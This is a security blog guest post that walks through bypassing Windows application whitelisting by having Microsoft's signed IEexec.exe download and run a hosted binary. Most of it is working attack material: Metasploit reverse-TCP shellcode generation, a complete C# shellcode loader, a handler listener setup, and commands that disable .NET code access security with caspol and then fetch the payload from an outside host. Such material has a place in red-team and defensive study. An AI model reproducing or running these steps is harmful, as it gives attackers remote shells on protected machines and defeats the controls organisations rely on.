Application Whitelist Bypass using IEexec.exe

Guest post by @infosecsmith2

There was a recent presentation at DerbyCon, entitled:

Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber

I highly recommend that you start with this presentation as it lays the foundation for this post.

The premise is, how can we maintain persistence in a corporate environment, using tools and defaults provided by the host OS we have compromised. This is a very important concept, given the shift in many organizations to an Application Whitelisting Defense model.

It is only a matter of time before time before you might encounter an Application Whitelisting Defense.

As a follow up to that presentation, I began exploring the binaries that ship by default with Windows. That is where I stumbled across a binary in the C:\Windows\Microsoft.NET\Framework64\v2.0.50727 path.

The Executable is ieexec.exe. A write up is here: http://support.microsoft.com/kb/822485

“The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.”

Excellent! So, now we just need to host our malicious binary , and call it from ieexec.exe.

This is great, since most Application Whitelisting Environments are going to “Trust” anything signed my Microsoft as a matter of convenience. IEexec.exe will download and execute our code for us, all under the trusted process.

So lets get started!

Step 1. Prepare your Shellcode, or whatever malicious app you want. I compiled my executable using SharpDevelop, since it has less footprint than a full blown Visual Studio install. From msfconsole:

12345678

msf > use windows/x64/shell/reverse_tcpmsf payload(reverse_tcp) > set LHOST x.x.x.xmsf payload(reverse_tcp) > set LPORT 443msf payload(reverse_tcp) > generate -t csharp
byte[] buf = new byte[422] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...<Snipped Full ShellCode for Brevity>

Step 2. Create the .NET wrapper application

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586

usingSystem;usingSystem.Runtime.InteropServices;namespacenative{classProgram{privatestaticUInt32MEM_COMMIT=0x1000;privatestaticUInt32PAGE_EXECUTE_READWRITE=0x40;privatestaticUInt32MEM_RELEASE=0x8000;publicstaticvoidMain(string[]args){// native function's compiled code byte[]proc=newbyte[]{0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52...//Edited ShellCode For Brevity };UInt32funcAddr=VirtualAlloc(0,(UInt32)proc.Length,MEM_COMMIT,PAGE_EXECUTE_READWRITE);Marshal.Copy(proc,0,(IntPtr)(funcAddr),proc.Length);IntPtrhThread=IntPtr.Zero;UInt32threadId=0;// prepare data PROCESSOR_INFOinfo=newPROCESSOR_INFO();IntPtrpinfo=Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));Marshal.StructureToPtr(info,pinfo,false);// execute native code hThread=CreateThread(0,0,funcAddr,pinfo,0,refthreadId);WaitForSingleObject(hThread,0xFFFFFFFF);// retrive data info=(PROCESSOR_INFO)Marshal.PtrToStructure(pinfo,typeof(PROCESSOR_INFO));Marshal.FreeHGlobal(pinfo);CloseHandle(hThread);VirtualFree((IntPtr)funcAddr,0,MEM_RELEASE);}        [DllImport("kernel32")]privatestaticexternUInt32VirtualAlloc(UInt32lpStartAddr,UInt32size,UInt32flAllocationType,UInt32flProtect);        [DllImport("kernel32")]privatestaticexternboolVirtualFree(IntPtrlpAddress,UInt32dwSize,UInt32dwFreeType);        [DllImport("kernel32")]privatestaticexternIntPtrCreateThread(UInt32lpThreadAttributes,UInt32dwStackSize,UInt32lpStartAddress,IntPtrparam,UInt32dwCreationFlags,refUInt32lpThreadId);        [DllImport("kernel32")]privatestaticexternboolCloseHandle(IntPtrhandle);        [DllImport("kernel32")]privatestaticexternUInt32WaitForSingleObject(IntPtrhHandle,UInt32dwMilliseconds);        [DllImport("kernel32")]privatestaticexternIntPtrGetModuleHandle(stringmoduleName);        [DllImport("kernel32")]privatestaticexternUInt32GetProcAddress(IntPtrhModule,stringprocName);        [DllImport("kernel32")]privatestaticexternUInt32LoadLibrary(stringlpFileName);        [DllImport("kernel32")]privatestaticexternUInt32GetLastError();        [StructLayout(LayoutKind.Sequential)]internalstructPROCESSOR_INFO{publicUInt32dwMax;publicUInt32id0;publicUInt32id1;publicUInt32id2;publicUInt32dwStandard;publicUInt32dwFeature;// if AMD publicUInt32dwExt;}}}

You will want to compile the exe for the target platform. In this case I am going for an x64 target. Also, you will want to compile for 2.0 or 3.5 Framework.

Step 3. Host the Exe. For this example, I used Mongoose. Simple and Effective:

http://code.google.com/p/mongoose/

By default Mongoose listens on port 8080. This is configurable. Simple place your compiled binary from step 2 into the same directory as Mongoose. Start Mongoose and you are almost ready to deliver your payload.

Step 4. Setup your receiver:

12345

msfpayload(reverse_tcp)>useexploit/multi/handlermsfexploit(handler)>setLHOSTx.x.x.xmsfexploit(handler)>setLPORT443msfexploit(handler)>setPAYLOADwindows/x64/shell/reverse_tcpmsfexploit(handler)>exploit-j

Step 5. From the host that is protected via Whitelisting. Open 2 Command Prompts as administrator.

CMD 1 Execute:

1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe-soff

 CMD 2 Execute:

1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>ieexec.exehttp://x.x.x.x:8080/bypass.exe

There is some detail to unpack here, I can go over later, as to why we need to run caspol.exe. Here’s the behavior I saw in our experimentation with this.

Initial attempt to run our rogue binary fails, since it is unknown/untrusted/unapproved:

Now, on the same host…

Executes just fine!

Its important to distinguish what this technique is and what it is not. This is not an exploit or vulnerability. Rather this is one way to execute arbitraty code in an Application Whitelisting Environment.

Summary:

In this document we learned that even if a host is in a mode where only trusted approved applications can run. IEexec.exe can be used in certain situations to circumvent a Whitelist, since it is likely a trusted binary, since it is signed by Microsoft.

Cheers,

=>@infosecsmith2